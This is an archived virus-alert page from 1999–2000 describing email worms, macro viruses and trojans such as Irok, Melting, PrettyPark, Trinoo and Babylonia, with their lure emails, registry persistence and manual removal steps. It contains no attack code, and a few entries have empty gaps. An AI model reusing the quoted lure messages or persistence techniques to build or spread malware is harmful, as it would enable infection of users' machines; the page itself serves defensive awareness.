Last upadted 10/17/2000

Lastest Virus Alerts:

• Irok Spreads Via Outlook And IRC • Melting Screensaver • Pretty Park Trojan Horse • Trinoo Becomes A PC Trojan Horse • New Spin On Old Trojan Horse • Myna Macro Virus • Haiku Worm • Plage2000 • NewApt Worm • Verlor Virus • LoveSong Virus • "Hi 2000" Worm Reported • Funny Worm • • Babylonia Virus • Mypics.Worm Strikes • MiniZip Virus • Prilissa Virus • FunLove Virus Warning • Bubbleboy Worm Alert! • Badass Virus Infects Outlook

Irok Virus Spreads Via Outlook And IRC By Edric Ta, Symantec March 24, 2000
Detected as:	Irok.Trojan.Worm
Infection Length:	10001 bytes
Area of Infection:	.COM and .EXE Files
Likelihood:	Rare
Characteristics:	Worm, Prepend
Description Irok.Trojan.Worm is a malicious worm that spreads itself using Microsoft Outlook email and Internet Relay Chat (IRC). The worm is sent as an email attachment. The message contains the following text: Subject: I thought you might like to see this and the body of the email message I thought you might like this. I got it from paramount pictures website. It's a startrek screen saver. When the Irok.exe is run, a black screen appears that makes the user appear they are navigating through space. In the background, the worm copies itself to C:\Windows\System directory and inserts the Irokrun.Vbs file in C:\Windows\StartMenu\Startup. It will prepend itself to executable files and the virus has been known to corrupt its host. The Irokrun.VBS script will use Microsoft Outlook to send the same email to the first 60 entries in the users address book. Trigger Event The Irok.exe attachment is launched and the VBS file is executed on reboot of machine. Symptoms When a user clicks on the attachment, a screen appears like one is navigating through space. Pressing the ESC key or SPACEBAR can quit the application. The worm has now copied itself in the C:\Windows\System directory and also imports a file called Irokrun.vbs in C:\Windows\StartMenu\Startup. A file named WinRDE.DLL is inserted in the C:\Windows\System. From this point on, all executable files are infected and will fail to run properly. Users would then reboot and the Irokrun.vbs file will be executed on machines with a Windows Scripting Host (WSH) installed. WSH is installed by default in Windows 98 and is also found on Windows 95 and Windows NT systems with Internet Explorer 5 installed. The Irokrun.VBS script will use Microsoft Outlook to send the same email to the first 60 entries in the users address book. It will then attach the Irok.exe file from C:\Windows\System directory. Repair The infectious files Irok.exe, Irokrun.vbs, and WinRDE.DLL should be deleted. Infected Users should also delete all files detected as Irok.Trojan.Worm.

Back to the top

Melting Screensaver Also known as Melting.Worm, W32.Melting, I-Worm.Melting. March 17, 2000 It's one part mean and one part nasty. This new virus can hit you with a lethal one-two combination. Keep your guard up with the latest info. Another attack has been launched. A new virus has been identified "in the wild/in the field" that could pose a threat to all Microsoft Windows systems. The consequences of falling victim to this infection could be astronomical and the payload can cause tremendous collateral damage. A combination virus/worm, Melting.Worm (a.k.a. Win32.Melting and I-Worm.Melting) has the potential to not only temporarily shut down systems, it can make the current platform permanently unusable. Identifying The Culprit The worm has several unique features that enable you to identify it and avoid contraction. The sender will most likely be a user who was previously infected and had you listed in their address book. Therefore, the source could inadvertently be a friend or family member. In the subject line, "Fantastic Screensaver" would appear. The body of the e-mail would read as follows: "Hello my friend! Attached is my newest and funniest Screensaver, I named it MeltingScreen. Test it and tell me what you think. Have a nice day my friend. p.s.: Please install the Runtime Library for VB 5.0, before you run the ScreenSaver" The attached file is called MeltingScreen.exe and is represented by a hexagonal snowflake. This is the actual virulent component of the e-mail and requires Visual Basic 5 runtime libraries to function. Is It A Virus Or A Worm? The virus constituent of the worm is exceedingly debilitating to a computer system. When the virus component of Melting.Worm is activated, it copies itself into a Windows directory as MeltingScreen.exe and remains resident in memory. The path it chooses is C:\WINDOWS\MeltingScreen.exe. In the Windows directory, all programs with a .exe file extension are changed to a .bin file and the virus assumes the identity of the original .exe files. For example, NOTEPAD.EXE would be changed to NOTEPAD.BIN and Melting.Worm would become NOTEPAD.EXE. The Windows directory is home to very integral system files. These changes can permanently disable the operating system or cause it to become unstable. After the virus has copied itself to C:\WINDOWS\MeltingScreen.exe it searches the registry for key HKEY_CURRENT_USER\MeltingScreen\String. If the key didn't exist, Melting.Worm then generates it and sets the default value to "MeltingScreen". The worm constituent functions very much like the Melissa virus that has received much press. When executed, Melting.Worm looks through your Microsoft Outlook address book and attempts to send a copy of itself to every address listed. When the worm is received, it is usually from a known source. This increases the amount of "trust" that a person may have when opening an attachment. These characteristics make the worm highly prolific in its distribution and execution. The overall implications of Melting.Worm are tremendous. The ability to administer such profound impairment and to distribute itself over the Internet makes Melting.Worm extremely dangerous. For the home user, the loss of data that could be experienced would be very frustrating and a great inconvenience. The Office/Business user would have greater issues to handle. The loss of data could potentially cripple a business, depending on how mission critical the information is. If Melting.Worm infects you, please contact the maker of your anti-virus software for handling instructions and report the infection. The best protection is to make sure you have the most current virus signature files available for your anti-virus software. New viruses are introduced daily and keeping signature files up to date is the most effective way to protect yourself. Please follow best practices by not opening e-mail form unknown or unfamiliar sources, and ALWAYS scan e-mail attachments irrespective of the source.

Back to the top


  Pretty Park Trojan Horse New!
March 6, 2000
It's back. The W32/Pretty.worm.unp (a.k.a. W32.PrettyPark) is back as a variant containing an unpacked version of the executable. Masquerading as an image of Kyle from the Comedy Central series South Park, the W32/Pretty.worm.unp is a fairly standard e-mail worm, that forwards itself to everyone in your e-mail address book. While the virus is not destructive, it can cause surges in e-mail volume, which in turn can cause bandwidth problems if many computers on the same network are infected.


Pretty Park arrives as a message from someone who has your e-mail address in his or her address book, the attached file shows up with a picture of Kyle from South Park for an icon. That this virus arrives as an attachment from someone you know, you might be tempted to let down your guard and open the attached program. Don't. In general, unless you're expecting a file, don't ever open an e-mail attachment, especially an executable file. And, to be safe, you should scan every e-mail attachment you receive, regardless of the source.

What It Does There are clues that the Pretty Park message contains a virus. For starters, the subject line reads, "C:\CoolProgs\Pretty Park.exe," the file may also show up as PRETTY~1.EXE. It's interesting to note that one rarely receives messages with a file name and path as the header. The next clue to the virulence of the message comes from the message itself, "Test: Pretty Park.exe :)" which is followed by the name of the sender. Again, this isn't a typical message someone you know would be likely to send you. Should you be unfortunate enough to execute the PRETTY PARK.EXE file, you may see the Windows screen saver pipes, or you may see nothing. Meanwhile the virus hooks into your system so that it will execute at startup, and begins sending itself to everyone in your address book. While it's emailing, it will also try to log into IRC. Once connected to IRC, the author of the virus could scan your system to find your dial up networking usernames and passwords, and other, less sensitive information.

What You Can Do Cleaning up isn't too much trouble. If you have a commercial anti-virus package, the latest update should have a fix for this virus. You can download the latest anti-virus software updates from ZDNet Updates.com and free demos of the leading anti-virus programs from the Software Library. If not, you'll have to break out a few Windows tools and make a go of a self-cleaning job. Your first task is to fire up the Windows registry editor (REGEDIT.EXE for Windows 9x or REGEDT32.EXE for NT). You can execute these programs from the run command on the start button, or by typing in the program name at an MS DOS prompt. The main part of the infection will be found in the registry keys that are used for automatic program loading. While installing, the virus will have copied itself to FILES32.VXD, this is the name to look for while editing your registry. Be careful as you work, any programs that are legitimately loaded at Windows startup will be listed under these keys, and you don't want to delete those. Infected registry keys will read files32.vxd ""%1" %* is the only program you find listed, you'll want to replace it with the string, including the quotation mark, ""%1" %* The keys you need to check to see if they contain FILES32.VXD are: HKEY_CLASSES_ROOT\exefile\shell\open\command\ HKEY_LOCAL_MACHINE\exefile\CLASSES\exefile \shell\open\command\ HKEY_LOCAL_MACHINE\Software\CLASSES\exefile \shell\open\command\ KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\RunServices\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Run\ You also need to delete the registry key set up by the virus, delete the whole entry: HKEY_CLASSES_ROOT\.dl Finally, take a look at your WIN.INI. Check under the [windows] heading, and see if FILES32.VXD is listed in the "run=" command. Also check over your SYSTEM.INI file to see if FILES32.VXD had added itself under the [boot] section to the "shell=" line. The only thing that belongs on the "shell=" line is EXPLORER.EXE. Once you've scrubbed your registry and system files, reboot. Now use the Windows Explorer, or start button, find files command to search for two files. First search all local rewritable drives for FILES32.VXD. Delete every instance. Now search for "PRETTY*.*". Delete every PRETTY PINK.EXE or every PRETTY~1.EXE. Now, hit Outlook or Outlook Express and make doubly certain the virus e-mail is deleted from every folder. Empty the deleted items folder. Close Outlook or Outlook Express. Empty the Recycle Bin. Reboot again for safe-keeping, and you're done. By the way, if you do get infected, resist temptation and don't send and apology e-mail to everyone in your inbox—they've heard from you enough for one day.

Back to the top

  Trinoo Becomes A PC Trojan Horse
February 25, 2000
Last week, antivirus vendors announced the discovery of the latest upgrade to Trinoo, one of a class of tools linked to recent distributed denial of service (DDoS) attacks on ZDNet, Yahoo, CNN, and other major Web sites.

Unlike prior versions, which have only been detected on Unix-based machines, the new Trinoo daemon runs on Windows PCs, giving DDoS attackers potential access to millions of additional computers. Even worse, the daemon has been rewritten as a trojan horse. Previously, Trinoo users have been forced to gain root access to a computer before manually installing the daemon; now, a would-be DDoS attacker can randomly distribute the trojan, counting on some portion of its recipients to inadvertently activate it.
Although it is often accompanied by separate "backdoor" programs like Back Orifice, Trinoo itself actually presents almost no direct threat to those infected. That doesn't mean that it's not a major issue, however; Trinoo's real targets are large Internet servers and routers. By giving would-be attackers easy access to such large numbers of machines, Trinoo significantly raises the potential for damage from future DDoS attacks.
What It Does

The Trinoo package consists of two separate components: the server or "master", which runs on the attacker's computer, and multiple daemons or "slaves." Prior to launching a DDoS attempt, the attacker covertly installs daemons on as many "innocent" computers as possible. He or she can then initiate the DDoS using the server application by sending a command to some or all of the daemons designating the intended target. The daemons, in turn, send a "flood" of UDP traffic at the target.
The new Trinoo daemon may be installed on a Windows PC in two different ways. An attacker who can break into the PC using Back Orifice or other cracking tools can install the software manually. Alternatively, the attacker can hide the Trinoo trojan horse in email attachments or web page downloads. In either case, once activated, the daemon launches a process called "Services," which listens for commands from the Trinoo server on port 34555. It also copies a file named "SERVICE.EXE" into the C:\WINDOWS\SYSTEM directory and adds a registry entry, ensuring the process launches on reboot.

The best defense against any trojan is common sense and caution. Always be suspicious of e-mail attachments and software downloaded from the web. Never open any file received from an unknown or untrusted source.
Always keep anti-virus software installed, active, and update. Schedule regular, frequent scans of your drives. As of this writing, anti-virus products from Trend Micro, Network Associates, and Symantec will detect the Trinoo trojan; others should have updates available soon.
If necessary, the daemon can be detected and removed manually. Pressing CTRL-ALT-DEL once will call up the task dialog box; infected machines will have a process called "Services" in this dialog. Existence of a file at "C:\WINDOWS\SYSTEM\SERVICE.EXE" is also an indication of infection. To disinfect your PC:
Remember, while Trinoo may not do any damage to your machine, it does threaten the Internet community at large. Be a good neighbor—keep your system Trinoo-free.


Back to the top



  New Spin On Old Trojan Horse
February 23, 2000
A new AOL-specific Trojan Horse worm has been identified; it operates as an Internet worm, stealing user passwords and forwarding "buddy-list" addresses to the virus' author. Identified near the first of the year, APSTrojan.qa has been designated as medium risk to end-users and low-risk to business users because most business users do not use AOL to access the Internet.

What It Does This worm comes as an AOL e-mail with as subject line, "hey you," and a message which reads: hey i finally got my pics scanned..theres like 5 or 6 of them..so just download it and unzip it..and for you people who dont know how to then scroll down..tell me what you think of my pics ok? if you dont know how to unzip then follow these steps When you sign off, AOL will automatically unzip the file, unless you have turned this feature off in your download preferences. If you want to do it manually then On the My Files menu on the AOL toolbar, click Download Manager. In the Download Manager window, click Show Files Downloaded. Select my file and click Decompress The e-mail comes with an attachment MINE.ZIP Activating this worm requires that you first open the e-mail, and then either use AOL's automatic unzip feature, or another utility to extract the zip file. MINE.ZIP unzips into two files: MINE.EXE and README.TXT. README.TXT is not significant, but can be used to identify the presence of the virus, as it contains the message, "Did you like it? Write Back ok?=Þ" The dirty work is done by MINE.EXE, a Visual Basic 5 (VB5) application which hooks into over 20 Windows DLL files. This is a complicated virus that uses a legacy configuration file which is often overlooked in Windows 98 and 95, WIN.INI. By making WIN.INI read only, to the point that neither ATTRIB.EXE or the file.properities dialog box in the Windows Explorer can change turn off the read-only attribute, the worm is able to assure that it will always be loaded in a RUN= line in WIN.INI-it also assures that no program with legitimate business in the WIN.INI file will be able to make any changes. Additionally, the worm creates three identical hidden files in the root, WINDOWS, and WINDOWS\SYSTEM directories: msdos98.exe; uninstallms.exe; and both mine.exe and ReadMe.Txt. Not only is the WIN.INI file modified with the command "RUN=uninstallms.exe," but the Windows Registry is also modified to ensure that even if WIN.INI is deleted then the virus will still activate. Specifically, this key is added to the Windows Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Run\Windows="c:\msdos98.exe". Note that as this is a VB5 program, it does require MSVBVM50.DLL to run-this program is included with Windows 98 but not 95 by default. Don't assume that the presence of the VB5 DLL is a sign of the virus, however, as a many programs are written in VB5.

What You Can Do

Getting this worm off of your system is a challenging prospect without an anti-virus program. You best bet is to update your virus software to the latest release.
If, on the other hand, you're feeling adventurous, you can fix your own system. First, you must get the system to boot into "safe mode." To get into safe mode, use the run command on the start menu to execute MSCONFIG.EXE. Now head over to the general tab, select the advanced button, and select the "Enable Startup Menu" option. Reboot. Choose safe mode from the menu that appears as your computer boots.
Once safely into safe mode, you have to find all signs of the Trojan and eradicate them. Start by using the start button's run command to execute REGEDIT.EXE. Once the registry file is loaded search for the key msdos98.exe. Delete the entire entry as specified above. Close the registry editor, take another trip to the run command and type in SYSEDIT.EXE. Find the WIN.INI file, and then look for the [Windows] section. Under that should be the line "RUN=uninstallms.exe". If you don't see this line, be sure to scroll the window all the way to the right, as there are reports that the Trojan tries to hide the run command by moving it the far right side of the window. Last, fire up the Windows explorer and search for the files mentioned above.
To be ultra-safe, make sure you include a search for the MINE.* which will give you all forms of the virus. Finding the other files will be a snap, but depending on how many programs you've loaded, the search for README.TXT may be a bit frustrating. The best way to find both of the text files associated with the virus is to use the search dialog to scan for the text strings: "Did you like it? Write Back ok?" and some of the text from the virus' e-mail message. Last delete the mail message from AOL. When all of this is done, you can shutdown and reboot your system. If you don't want the hassle of seeing the menu, go back to MSCONFIG.EXE, select the advanced button on the general tab, and unclick the "Show Startup Menu" option.


Back to the top


  Myna Macro Virus
February 14, 2000
The latest Word macro virus, Myna, is relatively lightweight in the world of viruses. Myna infects Word documents (similar to Melissa), but carries no malicious payload. However, the only truly safe method of dealing with these unwelcome and often dangerous bits of code is eradication. W97M/Myna is also known as W97M.Myna, and has at least five variants ranging from W97M/MynaA through W97M/MynaE.
The worrisome issue with Myna is the range of hosts it can infect. At present, Myna will infect Microsoft Word 97—including Word 97 with service release one (SR1) and above—and Word 2000. The infection site is the NORMAL.DOT template, and the virus infects when an infected document is loaded. After infection, Myna will infect on closing, opening, and creating new documents.

What It Does The virus turns off Word's macro warning feature, so the only time you'll see a macro warning is the first time you load an infected file. With no payload, Myna doesn't really consist of much. Essentially a variant of W97/Class, the viral code is located in the same VBA class stream module used by W97/Class, named "This Document." Viral infection is indicated by a string in an infected document that reads, 'answer=MYNAMEISVIRUS'." This string serves a simple marker for the start of the viral macro code. The basic precautions for Word macro viruses apply here. Make certain that you use the TOOLS menu, MACRO item to set security to high. Even if you've set the security level, a prudent check of your settings now and then is advised. This virus—and presumably other macro viruses—disables the macro security check feature in Word.

What You Can Do As of this writing, most commercial virus software vendors have released updates that include a check for Myna, so update your software to the most recent virus definition file. You do have a virus checker that you actually run on your PC at least once a day, don't you? Unless your computer exists in absolute isolation, not running virus software is simply begging for trouble. You can download the latest anti-virus software demos for free from the ZDNet Software Library or update your existing anti-virus software from ZDNet Updates.com. Detecting Infection As always, Myna can be removed without anti-virus software. It contains an identifiable string in a document file, so you can use Windows Explorer, My Computer, or the Start Button search facility for the text string—in this case, "answer=MYNAMEISVIRUS." You can then delete the file(s)—of course, you'll need to get the information out of those files first before you delete them. Obviously, just copying an infected file will copy the virus. If you find yourself with an open, infected Word file, here's what you can do. Select the text—and only the text—in your document. Note: You will lose all your text formatting when you do this. Paste the text into Notepad, and save your file as text. Avoid using the WordPad format because it has a file format similar to Word, and there's a chance the virus could be copied. Make a clean copy of NORMAL.DOT. •   Exit Word. •   Open Windows Explorer •   Select Program Files|Microsoft Office|Templates. •   Rename or delete NORMAL.DOT •   Open MS Word and open a new document. •   MS Word will create a new NORMAL.DOT •   Exit MS Word—the new NORMAL.DOT will be saved. Open MS Word, then your saved .txt files, reapply formatting in Word, and re-save them as Word documents. Not the easiest route, but if you're stuck without a virus cleaner it'll achieve the same results. As always, you can find the latest techniques and tools for preventing viruses and security violations in the ZDNet Help & How-To PC Protection Guide.

Back to the top


  Haiku Worm
February 10, 2000
Since the dawn of e-mail worms, it seems like a new one crops up almost daily. Mostly non-malicious, these worms are far more a headache for network administers who must deal with the bandwidth they eat up than a real problem for users. Now there's even a worm with some entertainment value.
W95/Haiku.Worm, a.k.a. I-Worm.Haiku, Win32/Haiku.worm, and W95.Haiku.16384.Worm, is a not so typical e-mail worm with a twist: it creates haikus, plays a sound file, and delivers an interesting lecture on how to create a haiku. Another twist that is worrisome is that this virus is Internet-aware: it contains all the code needed to send e-mail messages without an e-mail program, as well as to download files from the Web.

What It Does Several features make Haiku stand out among the pack of e-mail related viruses. Instead of hooking into Microsoft Outlook, Haiku scans files on your hard disk for e-mail addresses. It then uses the host TCP/IP stack to hook into an anonymous e-mail gateway. Once connected, it delivers its torrent of mail. In Haiku's case the mail consists of a subject line that reads, "Fw: Compose your own haikus", a Haiku, and then the tutorial on the art of the haiku. The attached program that activates the worm is named haiku.exe. The forward is a disarming tactic, making an unsuspecting user think it's a message sent by a friend, or a typical piece of junk e-mail. Like some e-mail worms to date, Haiku requires that the user execute the attached program either by double-clicking it in the mail message, launching it with a mouse click, or running it from the hard disk. Simply opening and reading the message will not activate Haiku. Should you execute haiku.exe, the first thing you'll see is a dialog box (See Figure A) with a haiku, and an Okay button. Haiku's next task is to hook itself into the Windows registry and place a renamed copy of itself as haikug.exe in the Windows directory. The program also modifies the WIN.INI file by placing a RUN= command to execute hakug.exe on startup. Figure A It's at this point that the program scours your hard disk, rooting through DOC, .EML, .HTM, .RTF, and .TXT files for e-mail addresses. This actually minimizes the damage that Haiku can do, since it does not appear to search through any address-book formats for common e-mail programs. Addresses in hand, Haiku fires up it's own mail engine and connects to the aforementioned anonymous mail server. Once connected, the mail engine uses SMTP to send itself as a MIME encoded attachment to all the addresses it has found on your hard drive. During this stage, you may see a message box that reads: "[I-Worm.Haiku, by Mister Sandman] The smallest box may hold The biggest treasure?" As a last gesture, Haiku connects to Xoom.COM and pulls down a .WAV file that plays a short snippet of Japanese Muzak.

What You Can Do

It is true that worms are bad news and violate both legal and ethical conventions. On the other hand, in this day of gigabyte sized programs, you really have to admire a 16KB program that includes a rules-based haiku generator, a dictionary of words, a how-to on haiku writing, a mail engine, and a disk-search engine. Still, self-propagating spam-generating programs are a serious problem. It's exactly this approach, taken to the nth degree that constitutes a denial of service attack. Make this worm a bit more infectious and vicious, and you could easily manage to tie up a company's data connection with thousands off junk e-mail messages.
Cleanup is a snap. You can either search for and delete every instance of HAIKU.EXE or HAIKUG.EXE, and then search your registry and WIN.INI file for references to the aforementioned program, or you can download a patch. Because this virus is so new, all you'll find at this time is warning messages on major virus vendor Web sites. An update should be available within a week, or you can use our instructions to delete the offending files.


Back to the top


  Plage2000
January 14, 2000
Computer Associates International on Thursday warned of a new computer worm on the horizon, the "Plage2000", which could threaten computer e-mail systems as well as e-business infrastructures.
The worm has been reported to be "in the wild" by customers of Computer Associates, the company said.
A worm is a computer program that replicates itself and spreads from computer to computer and infects an entire system. A computer virus, spreads from file to file. A worm can spread without human intervention.
The Plage2000 arrives as a reply to an e-mail previously sent by the user. The original e-mail will be quoted completely in the reply. The arriving e-mail says:
P2000 Mail auto-reply:
' I'll try to reply as soon as possible.
Take a look to the attachment and send me your opinion! '
Get your FREE P2000 Mail now!
The worm is attached to the message under one of the following names: pics.exe, images.exe, joke.exe, PsPGame.exe, newsdoc.exe, hamster.exe, tamagotxi.exe, searchURL.exe, SETUP.EXE, Card.EXE, billgt.exe, midsong.exe, s3msong.exe, docs.exe, humor.exe, or fun.exe.
Self-extracting file
On execution, the worm will present itself as a self-extracting WinZip file. Extracting this will cause one of the following 2 messages to be displayed:
WinZip self-Extractor
ZIP damaged: file worm name: Bad CRC number.
Possible cause: file transfer error
Or,
WinZip self-Extractor - worm name:worm name - Application Error The exception unknown software exception (0xc00000fd) occurred in the application ....
In the background the worm copies itself to the Windows directory under the name INETD.EXE and adds itself to the registry: "HKEYCURRENTUSER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run WindowsDir\INETD.EXE".
Every five minutes the worm tries to establish a connection to a running Outlook or Exchange client. When new e-mails are received it will reply to the unread e-mails with an e-mail like the one above. The original messages remain unread.
Although the worm does not have a destructive payload, its e-mail propagation mechanism poses a threat to any eExchange e-mail infrastructure since it can overload and take down mail servers.


Back to the top


  NewApt Worm
December 14, 1999

Detected as:	W32.NewApt.Worm
Aliases:	Worm.NewApt
Known Variants:	W32.NewApt.B.Worm, W32.NewApt.C.Worm, W32.NewApt.C2.Worm, W32.NewApt.D.Worm
Infection Length:	69,632 bytes
Likelihood:	Common
Detected on:	Dec 14, 1999
Region Reported:	Worldwide
Characteristics:	Worm, Y2K

Description
W32.NewApt.Worm was discovered on December 14, 1999 in Italy.
W32.NewApt.Worm is a multi-threaded worm that propagates by email. The worm has its own SMTP (email) engine to email itself. The worm will search various files on the hard drive to find email address that it sends itself out to.
The worm will send an email that contains one of the two following messages (depending on HTML support in the email client).

HTML compatible email clients:


Non-HTML compatible email client:


The email attachment may have one of the following file names.:


Also, the above mentioned files have no association with Message Mates products, which the email may suggest.
When the attached file is executed it will display the following error message:
The dynamic link library giface.dll could not be found in specified path: D:\sample:;C:\WINDOWS\SYSTEM; C:\WINDOWS;C:\WINDOWS\COMMAND
The worm will add the following registry key to load itself each time the computer is booted.


The worm appears to have a payload that triggers at midnight on Dec 25, 1999. When the payload activates, it will attempt to make a connection (and disconnect after a successful connection) to a specific corporate web site on port 80 (HTTP) every three seconds. The owner of this corporate web site has been notified. Please note the worm will modify the registry to enable auto-dial. This modification will allow connections to the Internet to occur automatically.
On June 12, 2000, the worm will try to remove itself from the registry when certain other conditions are meet. These conditions are dependent upon random calculations and may not always occur.
Variant Information
The W32.NewApt.B.Worm and W32.NewApt.C.Worm variant were discovered on Dec 22, 1999 and have the exact same file size (69,632 bytes) as the original version. A noticeable difference was the modified payload trigger date from the original version. The variants will trigger at midnight on Feb 2, 2000. The payload is identical and will attempt to make a connection to the same web site as the original version every three seconds.
These variants will also attempt to remove themselves one month after the original version. On July 12, 2000, the worm will try to remove itself from the registry when certain other conditions are meet. These conditions are dependent on random calculations and may not always occur.
The W32.NewApt.D.Worm variant was discovered on Jan 10, 2000. A noticeable difference is the modified payload trigger date from the original version. The "D" variant will trigger at midnight on March 2, 2000 and the name of the file attached to the email may contain sexually explicit references.

Norton AntiVirus users can protect themselves from this virus by downloading the current virus definitions either through LiveUpdate or from the Download Virus Definition Updates page.


Back to the top


  Verlor Virus
December 6, 1999

Detected as:	W97M.Overload
Aliases:	W97M.Velor, Overlord
Infection Length:	6,233 bytes
Likelihood:	Common
Detected on:	Dec 6, 1999
Region Reported:	Worldwide
Characteristics:	Macro, Stealth

Description
W97M.Overlord is a macro virus, which infects Microsoft Word97 (including SR-1) and Word2000 documents. This virus places its code in a macro module named Module. The virus has stealth capabilities so, when opening the Visual Basic Editor or selecting Tools | Macro, the virus will remove all infectious code from open documents and the NORMAL.DOT and then will re-infect them at a later time.
The virus may also insert these files into your Windows directory: OVERLORD.B.VBS, OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL.
OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL cannot cause any viral infection. These files should be deleted.
The virus may also add the registry key:
HKLM\software\RegisteredOwner = "the Overlord"
and may modify the WIN.INI, adding the line:
run = <Windows directory>\overlord.b.vbs
This virus has no other payload.
Technical Description
When opening documents, the virus appends the name of the document to the file C:\HIMEM.SYS. This allows the virus to keep track if opened documents were not infected so they can be infected at a later time.
When closing documents, the virus infection routine is activated. The virus first checks if the files TEMPAD.DLL or TEMPNT.DLL exist in the Windows directory. These are temporary files created by the virus for its infection routine. If they exist, the files are deleted.
The virus then turns off the macro virus protection feature.
Next, the virus infects the NORMAL.DOT and active documents. In the process, the virus creates the temporary files TEMPAD.DLL and TEMPNT.DLL. These temporary files cannot cause any viral infection.
Finally, the virus checks if the newly infected document filename exists in the file C:\HIMEM.SYS. If the filename exists, the line is removed signifying successful infection.
The virus also contains stealth features. If a user opens the Visual Basic Editor in attempt to view the macrocode, the virus calls a stealth routine. The stealth routine first adds the registry key:
HKLM/Software\registeredOwner = "the Overlord"
Then, the virus opens the WIN.INI file and adds the line:
run = <Windows directory>\overlord.b.vbs
Next, the virus inserts the file OVERLORD.B.VBS that contains viral code. The virus also creates a file named OVERLORD.B.DLL. This file is a plain text file and cannot cause any viral infection.
Finally, the actual stealth routine begins. The virus removes all the viral code in any open documents and the NORMAL.DOT, and the Visual Basic Editor is displayed. However, since the virus removed all the virus code, one may be fooled into believing they are not infected.
The VBS file that is inserted into the system then performs a re-infection when the computer is restarted. The VBS file re-infects the NORMAL.DOT and any files, which were left uninfected when opening the Visual Basic Editor. The C:\HIMEM.SYS file is used to determine which files need to be re-infected.
Also, when selecting the Tools | Macro menu, the virus removes all the viral code from the NORMAL.DOT and any open documents. After finishing with the Tools | Macro menu, the virus re-infects the NORMAL.DOT and open documents. This may lead one to believe they are not infected.
Repair Notes
The registry key:
HKLM/Software\registeredOwner = "the Overlord"
should be removed or corrected.
The line:
run = WINDOWS DIRECTORY\overlord.b.vbs
should be removed from the WIN.INI file.
The virus turns off the macro virus protection feature of Word97. This can be enabled by selecting Tools | Options | General | Macro Virus Protection.
Any temporary files including OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL in the Windows directory may be deleted.
The infectious file OVERLORD.B.VBS should be deleted.


Back to the top


  LoveSong Virus
December 29, 1999

Detected as:	W95.LoveSong.998
Aliases:	W95.Love.998
Infection Length:	998 bytes
Likelihood:	Common
Detected on:	Dec 29, 1999
Trigger Date:	After Feb 26, 2000
Region Reported:	Korea

Description
W95.LoveSong.998 is a memory resident Windows 95/98 virus discovered in Korea.
Once an infected file is executed, the virus will load into memory and will infect files that are accessed. The virus code will be inserted into the .reloc section of the 32-bit executable. If this section of the file is not large enough, it may corrupt the file.
The technique used to hook the file access is based on the method used in the W95.CIH virus. But W95.LoveSong.998 will not split its code like the W95.CIH virus.
The virus has a payload that plays a popular commercial Korean song on the PC speaker. From analyzing the payload routine, the virus will trigger after Feb 16, 2000 with exception of the 30th of each month when certain criteria are meet. The virus contains the text love and because of its payload, the virus was named LoveSong.


Back to the top


   "Hi 2000" Worm Reported
December 6, 1999

Detected as:	W32.HLLW.Soft6
Aliases:	W32.HLLP.Soft6, W32.Soft6, W32/Soft6.worm, W32.Hi2000
Infection Length:	Instals.exe:306,688bytes and Servicess.exe: 329,728 bytes
Likelihood:	Rare
Trigger Dates:	9am to 12pm on any day
Detected on:	Dec. 6, 1999
Region Reported:	US
Characteristics:	Worm, Y2K

Description
W32.HLLW.Soft6 is a worm that was discovered on Dec. 6, 1999. The worm propagates automatically through the network and displays the message "Hi 2000" between 9am and 12pm. The worm only infects Windows NT systems.



Technical Description
The worm consists of two files named instals.exe and servicess.exe. The worm will only propagate over the network when the worm program (instals.exe) is executed using Administrator or equivalent rights.
When instals.exe is executed, the worm will search for other Windows NT machines and copy both files into the SYSTEM32 directory. The registry on these machines will be modified and set to launch instals.exe every time the machine boots as well as loading servicess.exe as a service.
Once these changes are made, the worm will reboot the newly infected machine automatically to load the worm. The worm will run as a service named "service". Between the hours of 9am and 12pm, the worm will continuously display a "Hi 2000" message on the screen. The newly infected machine will also try to find more Windows NT machines to repeat the propagation process. After some time, both instal.exe and servicess.exe will become zero bytes and the worm will no longer function correctly.
Symptoms of the worm are:

•

"Hi 2000" message being displayed on Windows NT machines

•

Files named instals.exe and servicess.exe in the SYSTEM32 directory of Windows NT machines

Repair Notes
The worm can be removed manually by following these steps.

Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the Download Virus Definition Updates page


Back to the top


  Babylonia Virus

December 17, 1999
A new Trojan horse/virus program, dubbed W95.Babylonia by the virus trackers at the Symantec AntiVirus Research Center, is spreading across the Internet, propagated primarily by users of the popular mIRC Internet Relay Chat program. While the virus is currently more annoying than destructive, it may become more harmful in the future

How Does It Spread?

W95.Babylonia is so far known to have spread in two ways: via Usenet News and via IRC. According to Symantec, the virus was originally posted to an Internet newsgroup inside a Windows Help file named serialz.hlp. This file was claimed to be a list of serial numbers for "Warez" (pirated commercial software). But if the help file is opened, it exploits a little-known feature of Microsoft Windows which allows help files to contain executable programs. Merely opening the help file causes the Trojan horse program to be released within user's computer system and begin wreaking its mischief.
Antivirus firm Trend Micro reports that at least one version of W95.Babylonia has been spreading itself, like the Happy99 virus, via an e-mail through an attachment named X-MAS.EXE. (This file can be recognized by name or by the icon it displays: a picture of Father Christmas.)
The primary mode of propagation, however, is IRC, or Internet Relay Chat. W95.Babylonia uses IRC in a way similar to that in which Melissa and Happy99 use e-mail. If an "infected" user runs mIRC and connects to an IRC "channel" (or chat room), W95.Babylonia will broadcast itself to everyone on the channel as if the user herself had sent it. The accompanying message proclaims the program to be to be a Y2K bug fix for the mIRC program.
As with e-mail Trojan horses, the fact that the message seems to have come from a known (and possibly trusted) source may make recipients feel comfortable about running the attached program. But if recipients take the bait and do so, W95.Babylonia infects their machines and propagates itself from them in turn. Once W95.Babylonia has been activated on a computer, it can infect any of the executable files and Windows help files on that machine.
Symantec does not report any incidents in which the infection has spread to shared disks via Microsoft's "Network Neighborhood" feature. However, since this mode of propagation is likely, special precautions should be taken if even one machine on a network with file sharing is infected. The safest procedure is to disable the LAN and scan all machines on the network for the infection before reconnecting them

